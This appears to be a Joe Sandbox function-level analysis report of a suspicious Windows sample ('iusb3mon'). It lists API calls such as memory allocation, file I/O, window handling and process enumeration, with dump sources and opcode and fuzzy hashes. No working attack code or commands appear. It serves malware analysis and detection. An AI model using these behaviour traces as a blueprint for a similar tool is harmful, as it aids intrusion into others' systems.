Function 04D7F990 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,?,?,04D78D56,04D7FE5C,00000000,00000010,00000000,00000009,00000009,?,04D7AD87,00000010,00000000), ref: 04D7F9B1
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,04D78D56,04D7FE5C,00000000,00000010,00000000,00000009,00000009,?,04D7AD87,00000010,00000000), ref: 04D7F9D5
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,04D78D56,04D7FE5C,00000000,00000010,00000000,00000009,00000009,?,04D7AD87,00000010,00000000), ref: 04D7F9EF
VirtualFree.KERNEL32(00000000,00000000,00008000,?,04D78D56,04D7FE5C,00000000,00000010,00000000,00000009,00000009,?,04D7AD87,00000010,00000000,04D78D56), ref: 04D7FAB0
HeapFree.KERNEL32(00000000,00000000,?,04D78D56,04D7FE5C,00000000,00000010,00000000,00000009,00000009,?,04D7AD87,00000010,00000000,04D78D56,00000000), ref: 04D7FAC7

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 5cccfa90490fbdbead9c3dab586b82f7bdac9b96c35ac6d18f6f56dfe3e46659
Instruction ID: 5345f5f6ccc83e9c8788e097f0df8b9cca2ca964443e56ac27b6e5caecb87f4e
Opcode Fuzzy Hash: 5cccfa90490fbdbead9c3dab586b82f7bdac9b96c35ac6d18f6f56dfe3e46659
Instruction Fuzzy Hash: 4331DC72B40706ABE7308F28DC41B21B7E5EB44765F10812EE26AD7380EB74AC448B55

Function 04D819EA Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 04D81A64
GetLastError.KERNEL32 ref: 04D81A6E
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 04D81B34
GetLastError.KERNEL32 ref: 04D81B3E

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 0cc39af29d759d951d34973bd4e1bf37bd6f95d2217a76f99324e02714c4fec8
Instruction ID: 74c55e56c164a292677050456f56d6d83cd3115a1dfcc154262fd9281092e00c
Opcode Fuzzy Hash: 0cc39af29d759d951d34973bd4e1bf37bd6f95d2217a76f99324e02714c4fec8
Instruction Fuzzy Hash: 70519F34A042859FDB21AFA8C884BBD7BA0FF47304F18859DE8A58B251E774F54BCB51

Function 04D81626 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000824,?), ref: 04D816ED

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: e308660f25d398ed97be7a004b8cb92aa9634e3b6a56ea38b85fb8f2ffe74d75
Instruction ID: 5fc657732f7d11a540da41432fe9fc803a408a758330a45f6eb7a665815c960f
Opcode Fuzzy Hash: e308660f25d398ed97be7a004b8cb92aa9634e3b6a56ea38b85fb8f2ffe74d75
Instruction Fuzzy Hash: 7A516B71A00218EFDB12EF68CC84ABD7BB5FF45340F14859DE8559B250EB70EA49CB60

Function 04D86B0E Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(04DA893C), ref: 04D86B52
InterlockedDecrement.KERNEL32(04DA893C), ref: 04D86B61
InterlockedDecrement.KERNEL32(04DA893C), ref: 04D86B94
InterlockedDecrement.KERNEL32(04DA893C), ref: 04D86C2C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: 8c1a77f6b7142521b3404ab09ad0a33c9a2207c9170e17ae73d5ccac325ff09a
Instruction ID: 8468515a4c75a762b6abb593ce5e5ca942d37e462bb38cc1922f8a0d03b4e295
Opcode Fuzzy Hash: 8c1a77f6b7142521b3404ab09ad0a33c9a2207c9170e17ae73d5ccac325ff09a
Instruction Fuzzy Hash: 6B312331A04214BFFB223E60DD45BBA7FA9EB52B38F18005DF4455A2C1EA38F981D761

Function 04D8BF72 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04D8C0EA: GetParent.USER32(?), ref: 04D8C11D
Part of subcall function 04D8C0EA: GetLastActivePopup.USER32(?), ref: 04D8C12C
Part of subcall function 04D8C0EA: IsWindowEnabled.USER32(?), ref: 04D8C141
Part of subcall function 04D8C0EA: EnableWindow.USER32(?,00000000), ref: 04D8C154

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 04D8BFA8
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 04D8C016
MessageBoxA.USER32(00000000,?,?,00000000), ref: 04D8C024
EnableWindow.USER32(00000000,00000001), ref: 04D8C040

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: 9e444c7e2ab630cab624a1e80e56fe251499e475358240ecba91881819c14512
Instruction ID: dc53b8a1e27cc904c6b43efb86ef98e48186fb6f225ab872375c78d38be90b3f
Opcode Fuzzy Hash: 9e444c7e2ab630cab624a1e80e56fe251499e475358240ecba91881819c14512
Instruction Fuzzy Hash: D2216F72A10119EBDB20AEA5C881ABDBBA9FB04750F14442FF614E6241DB72FD408F60

Function 04D833E5 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(04D7EA70,00000001,00000000,?,?,?,?,?,?,04D7EA70,?,0000000C), ref: 04D83414
MultiByteToWideChar.KERNEL32(04D7EA70,00000009,0000000C,?,00000000,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83427
MultiByteToWideChar.KERNEL32(04D7EA70,00000001,0000000C,?,?,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D8348B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 957710b38e54f52cdfad2b9c1fabb1ccc36781e8f90856009c2d38b9b54f41d5
Instruction ID: 07cfa8b61feacad8c53494b0bc536526e3a249878b5f28c5d4b10767a8fdae0b
Opcode Fuzzy Hash: 957710b38e54f52cdfad2b9c1fabb1ccc36781e8f90856009c2d38b9b54f41d5
Instruction Fuzzy Hash: 0A213732900219EBCF229FD8DC459EEBFB5FB48750F104129FE1962160D336A921DBA0

Function 04D7827E Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,00000000,?,?,04D77ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 04D782BA
VirtualFree.KERNEL32(?,00000000,00008000,?,?,04D77ED1,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 04D782DE
GetProcessHeap.KERNEL32(00000000,?,?,?,04D77ED1,00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 04D782E6
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000,?), ref: 04D782ED

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$Heap$LibraryProcessVirtual
String ID:
API String ID: 548792435-0
Opcode ID: 9948826101268637fb5ff21168889ec59a3e7891828e7fc0baafffd185a3c921
Instruction ID: 3bc7a0e8cfc2f3c1e67eb4588df39d6b8e30c54a1f1065abbcb2cf53706b0394
Opcode Fuzzy Hash: 9948826101268637fb5ff21168889ec59a3e7891828e7fc0baafffd185a3c921
Instruction Fuzzy Hash: 3E012D72600A01AFD7209FA8DCD8827B7E9FB44326304492DF666D3550D734B841DF50

Function 04D8A7C9 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 04D8A7D7
SendMessageA.USER32(00000000,?,?,?), ref: 04D8A80D
GetTopWindow.USER32(00000000), ref: 04D8A81A
GetWindow.USER32(00000000,00000002), ref: 04D8A838

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 21effe4bcfde2ead962789c322cb24f6dcd637e7499c12486bc20734600c1928
Instruction ID: 6871ed78745afddb61086476b616e7e9ea9f6870a78c9096e303bab6678cb444
Opcode Fuzzy Hash: 21effe4bcfde2ead962789c322cb24f6dcd637e7499c12486bc20734600c1928
Instruction Fuzzy Hash: 3B01E93210161AFBDF126E95DC04EAF3B7AEF09750F048029FA0451260C73AD962EBB1

Function 04D8A750 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 04D8A75B
GetTopWindow.USER32(00000000), ref: 04D8A76E
GetTopWindow.USER32(?), ref: 04D8A79E
GetWindow.USER32(00000000,00000002), ref: 04D8A7B9

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: bd9cdc8d2bf34e721f16a5e4ae3bec789420077cf931b9ef7ab067021275b10b
Instruction ID: 75711dc1d9691e95f79a9ed653bbf4b7faf20357d52a85ba9597c75cef3b62f4
Opcode Fuzzy Hash: bd9cdc8d2bf34e721f16a5e4ae3bec789420077cf931b9ef7ab067021275b10b
Instruction Fuzzy Hash: AB014B32201615BBAF223E619C10EBE7B79EF45B54F05402AFD0495310E739E912BAA1

Function 04D88C3E Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 04D88C66
GetFocus.USER32 ref: 04D88C79
GetParent.USER32(?), ref: 04D88C87
GetNextDlgTabItem.USER32(?,?,00000000), ref: 04D88CA3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 0480fe5fa43586d48d62e76fe0fa7f69a5faf049570e1fa54ea0baa59f530e6a
Instruction ID: 3c6ebfb131d16ff14cfee4493c1e665c32be67bba4d959c44548f7800b5014aa
Opcode Fuzzy Hash: 0480fe5fa43586d48d62e76fe0fa7f69a5faf049570e1fa54ea0baa59f530e6a
Instruction Fuzzy Hash: 22115B71610A00AFEB28BF60D868F3AB7B5FF50311F118A6DF146866A0CB74F855DB60

Function 04D865EF Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(04DA88B8,00000001), ref: 04D86617
InitializeCriticalSection.KERNEL32(04DA88A0,?,?,?,04D8495C), ref: 04D86622
EnterCriticalSection.KERNEL32(04DA88A0,?,?,?,04D8495C), ref: 04D86661

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 44a5c573a1425a9a240ecae2de88d25eb4dff1049ecebc75e6317d63d44b22cb
Instruction ID: a13fbbec314a63db00e5538194241fa083940d0fa4e5e8bcd9e239f5a720e169
Opcode Fuzzy Hash: 44a5c573a1425a9a240ecae2de88d25eb4dff1049ecebc75e6317d63d44b22cb
Instruction Fuzzy Hash: 05F0A470B442409BE7517E64BC9FE393BA4F7807F5B10006DFA41D2240E975E8A06B52

Function 04D8AD58 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 04D8AD96
SetBkColor.GDI32(00000000,00000000), ref: 04D8ADA2
GetSysColor.USER32(00000008), ref: 04D8ADB2
SetTextColor.GDI32(00000000,?), ref: 04D8ADBC

Part of subcall function 04D8B81C: GetWindowLongA.USER32(00000000,000000F0), ref: 04D8B82D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: b218988f11f918aebd0fd2d60764a14cb672a2e7f3a2f0fbb8e2bc574870286d
Instruction ID: 719e965114d30b8e400a7423a7fe110f3376cae2821b4987721f816907a84044
Opcode Fuzzy Hash: b218988f11f918aebd0fd2d60764a14cb672a2e7f3a2f0fbb8e2bc574870286d
Instruction Fuzzy Hash: A2013C31200109BBEF216F64DC49BBE3B65FB00352F55891AF902D93E0E7B4E994DB61

Function 04D78D94 Relevance: 6.0, APIs: 4, Instructions: 42processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,75918A60,04DA2BE8,04D97FD0,04D77609,04D97FD0,?,?,?), ref: 04D78D9B
Process32First.KERNEL32(00000000,00000000), ref: 04D78DB4
Process32Next.KERNEL32(00000000,00000000), ref: 04D78DD0
lstrcmpiA.KERNEL32(00000024,04DA2BE8), ref: 04D78DDE

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 2530627638-0
Opcode ID: 71ac58d66151c0c6f5aba94c9789f492854de355d3c7e495f89e1a60541da038
Instruction ID: dda9d7033dcbfbb578b28bf0f98bb924b9b46017837d01e975c2b580a33c84e5
Opcode Fuzzy Hash: 71ac58d66151c0c6f5aba94c9789f492854de355d3c7e495f89e1a60541da038
Instruction Fuzzy Hash: E5F03A72309312AFE7207A669C88F7B6AECEF95664F14485DF544D6080FB28F802A675

Function 04D71BFF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04D71C0F
Process32First.KERNEL32(00000000,?), ref: 04D71C28
Process32Next.KERNEL32(00000000,00000128), ref: 04D71C43
CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?,00000002,00000000), ref: 04D71C68

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 770ba0e7218b3e1b2b28229525c480feb57e52670af9abf3f7430f19b4150a41
Instruction ID: cf69e13ecbbb4b634d8f7a048289a441376ab451b06ada9e98f30dd3fe981922
Opcode Fuzzy Hash: 770ba0e7218b3e1b2b28229525c480feb57e52670af9abf3f7430f19b4150a41
Instruction Fuzzy Hash: E5F096716052096BFB20ABA5DC84FFEB7BCEF49368F0001A9E944D2240FE74E9954A31

Function 04D8B8DB Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 04D8B8E8
GetWindowTextA.USER32(?,?,00000100), ref: 04D8B904
lstrcmpA.KERNEL32(?,?), ref: 04D8B918
SetWindowTextA.USER32(?,?), ref: 04D8B928

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 0a5019bd2145532dfd88fa96f12ad4b60c10728297f02adfb904016829065f90
Instruction ID: 3d909712e7ab257c00b9c81f4b12855fad98459a2032347a5341e20773278e8e
Opcode Fuzzy Hash: 0a5019bd2145532dfd88fa96f12ad4b60c10728297f02adfb904016829065f90
Instruction Fuzzy Hash: B1F0F836400118BBDF227E64DC08AFD7BADFB09791F00802AF869D5210E774EE948F90

Function 04D73D3B Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 04D73D53

Strings

Remarkbeizhu, xrefs: 04D73D41
Console, xrefs: 04D73D62
Groupfenzhu, xrefs: 04D73D48, 04D73D61

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: strlen
String ID: Console$Groupfenzhu$Remarkbeizhu
API String ID: 39653677-274741502
Opcode ID: 6ac8427c520260145cc2d1a768f45019e54ddc7fabf905f5bc47feda5e4d4a5b
Instruction ID: c7c973e4c61f88293c4b64129141feac5cc4ae499bffde7c1ff64a770366a994
Opcode Fuzzy Hash: 6ac8427c520260145cc2d1a768f45019e54ddc7fabf905f5bc47feda5e4d4a5b
Instruction Fuzzy Hash: 7AD05B32954210FBFF105914EC09FE676E5EB40720F154459B908B6191D7F26CD0C6A5

Function 04D7703A Relevance: 6.0, APIs: 4, Instructions: 17servicesleepregistryCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,04D77029), ref: 04D77048
CloseServiceHandle.ADVAPI32(?,04D77029), ref: 04D7705C
RegCloseKey.ADVAPI32(?,04D77029), ref: 04D77070
Sleep.KERNEL32(000001F4,04D77029), ref: 04D7707B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Close$HandleService$Sleep
String ID:
API String ID: 994006413-0
Opcode ID: d737bea94c251c3dab2d38bed0211f907bb3956544618b195d2707bd81666b7d
Instruction ID: cab9704f19c9bac9ec1fde8db24e855baeae2a23009df14da892a98e3e8f4364
Opcode Fuzzy Hash: d737bea94c251c3dab2d38bed0211f907bb3956544618b195d2707bd81666b7d
Instruction Fuzzy Hash: 54E07E31A1011AEFEF326FA0ED596AC7B76FB00302F4448E8A10DA85609A342FC1EE51

